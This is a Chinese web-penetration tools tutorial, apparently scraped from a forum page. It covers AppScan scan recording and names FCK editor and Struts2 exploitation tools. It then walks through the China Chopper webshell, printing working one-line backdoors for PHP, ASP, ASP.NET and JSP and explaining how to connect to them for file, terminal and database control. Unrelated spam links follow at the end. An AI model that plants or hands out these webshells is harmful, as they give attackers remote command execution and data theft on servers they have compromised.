这里提供三种方式来记录帐号,不多介绍。第一种和第三种最常用。
然后点击几个下一步后出现后面的选项,选择第三个或第四项完成扫描的配置。
录制扫描脚本
完成配置后,下面就要开始录制脚本了呢。
点击工具栏上的探索按钮,appscan会打开自带浏览器,输入系统用户名密码登录系统,对你要扫描的模块功能进行操作。
上图为我打开的appscan自带浏览器(因为我输入的网址有误,所以无法访问)。操作完成之后,点击暂停按钮,关闭浏览器窗口即可。
关闭浏览器后,上面的窗口中会记录所有你访问的连接,点击确定。所有的信息就会记录下来了,下面要做的点击点击工具栏上的扫描按钮开始扫描。我们一般晚上下班进行,第二天早上来看扫描结果就可以了。
本来到这里就可以结束了,我再多说个设置。在手动探索的时候,因为打开的浏览器是appscan自带的,可能会存在兼容性问题,有些页面无法正常打开。那么是否可以用我们电脑上的浏览器(IE 、火狐、谷歌)来进行录制呢了。当然是可以的。
菜单栏--工具---选项----高级
这个一定要大图,我们只需要修改openExternalBrowser&选项&值&的参数就可以了(1=IE、2=firefox、3=chrome)。
4.Acunetix WVS 7使用
六.漏洞利用工具
1.FCK编辑器漏洞综合利用工具
2.Struts2终极漏洞利用工具
Struts2终极漏洞:远程代码执行漏洞,获取权限可执行任意命令。
详细原理介绍参考网址:
七.上传工具
中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。最强悍的是软件服务端只需要简单的一行代码.这绝对可以排入叉叉最喜欢的十大软件排行榜。(Ps:在某些黑阔手中菜刀算得上是居家旅行,杀人越货的必备神器),究竟中国菜刀怎么使用?下面是叉叉的一些使用方法和经验总结
客户端界面:
在服务端运行的代码如下:
PHP: &?php @eval($_POST['pass']);?&ASP: &%eval request(&pass&)%&ASP.NET: &%@ Page Language=&Jscript&%&&%eval(Request.Item["pass"],&unsafe&);%&
JSP:&%if(request.getParameter(&f&)!=null)(new java.io.FileOutputStream(application.getRealPath(&\&)+request.getParameter(&f&))).write(request.getParameter(&t&).getBytes());%&(注意: ASP.NET要单独一个文件或此文件也是Jscript语言)
叉叉之前在上传演示,利用burpsuite抓包改包上传最后讲到用菜刀连接,看看是怎么实现的:
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(这个必须要),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了.
1. 文件管理:缓存目录,并支持离线查看缓存目录,上传下载修改文件
2. 虚拟终端:人性化的设计,操作方便;(输入HELP查看更多用法)
3. 数据库管理:图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
关于配置信息怎么填?PHP脚本:&T&类型&/T& 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种&H&主机地址&H& 主机地址可为机器名或IP地址,如localhost& U&数据库用户&/U& 连接数据库的用户名,如root& P&数据库密码&/P& 连接数据库的密码,如123455ASP和ASP.NET脚本:&T&类型&/T& 类型只能填ADO& C&ADO配置信息&/C&ADO连接各种数据库的方式不一样。如MSSQL的配置信息为Driver={Sql Server};Server=(local);Database=Uid=Pwd=123456
叉叉用本机的mysql来演示:
4.网站蜘蛛功能:织出一张网站的目录结构。下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。
5.定时提醒当闹钟来使吧, 周期:每月/每周/每日/只一次。
6.快速启动一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。7.地址栏输入HELP
8.自定义服务端代码
参考地址:
八.后台、目录扫描工具
打开工具,添加URL
双击添加目录、后台字典文件,设置线程,HTTP响应回显信息
阅读(...) 评论()}
我要回帖
更多关于 渗透测试最有效的方法 的文章
更多推荐
- ·孩子可以在本小孩到外地上学需要什么手续吗?
- ·解放j6p原车柴暖一下不着了,后来关了从开启动不了电源灯柴暖不启动一直闪灯不着怎么回事烁是什么情况啦?
- ·如何怎样锻炼孩子的专注力不集中和耐心?
- ·现在深圳罗湖区有哪些教育培训机构深圳脱产英语培训学校哪个好呢?
- ·05345051095属于0534开头的是什么电话号码?
- ·海信和容声冰箱哪个好冰箱BCD398WTJ怎么解锁?
- ·手机怎么安卓手机恢复微信记录录了的
- ·大神官邪尾蛇帮忙看一下,8尾是不是太多了
- ·万唯17临化中学多少分可以上化预测
- ·可否把三相电的其中两相用单相电两相电三相电整流桥来整流
- ·之前一直在育儿的论坛中听说蒙氏结节教育,江北现在有这样的学校吗?
- ·韩城那里可以找到建筑工地砌墙小发明小工
- ·砌体砌体基础分项工程包括括哪些,砌体砌体基础分项工程包括括哪些知识
- ·罗湖哪里有罗湖古筝培训训的 古筝难学吗 古筝在哪学
- ·六个月的灰贵能吃海洋之星狗粮怎么样的狗粮吗,影响返灰吗
- ·东莞万江有男科医院吗日语培训学校吗
- ·2x416平方电缆多少钱一米1米
- ·初中化学方程式式中为什么有能量
- ·英制螺纹标注方法和美制螺纹的区别
- ·什么样的梦想战胜困难才能成就梦想算是比较远大的梦想? 远大的梦想跟普通平凡的梦想有什么区别?
- ·什么是渗透测试最有效的方法 渗透测试最有效的方法的方法
- ·澳玛克斯儿童学习桌怎么样,好不好用,为什么受追捧
- ·什么是国际地位家形象
- ·微笑是甘甜读书滋润了我的心灵干渴的心灵是哪一篇作文
- ·钢筋招标文件14/9米一件是多少吨
- ·建筑工地安全标语住人丶办公室电价多少一度
- ·油田十五小,三年级同步作文习作八
- ·一个android 圆形扇形菜单,一个竖线,一个扇形,编一个美丽的故事
- ·用G7|编程车外圆 出现浅数控车床螺纹编程实例路 求原因 用普通G0|车外圆没这现象呀
- ·拜见二朗神,三姑六婆猜一个数字字
- ·the australiann一定要大写吗
- ·请把我请人解答问题的app4-10题
- ·我是肩周炎,但是敏感皮肤,我想试试老倪祖三贴怎么代理,如过敏真的保退吗?三天无效真的退款吗?
- ·诊断印象: 右枕部病变压迫右侧横窦近端,局部窦腔变窄 左侧横窦较纤细会怎样及乙
- ·痛疯发作时癫疯病吃什么药药好
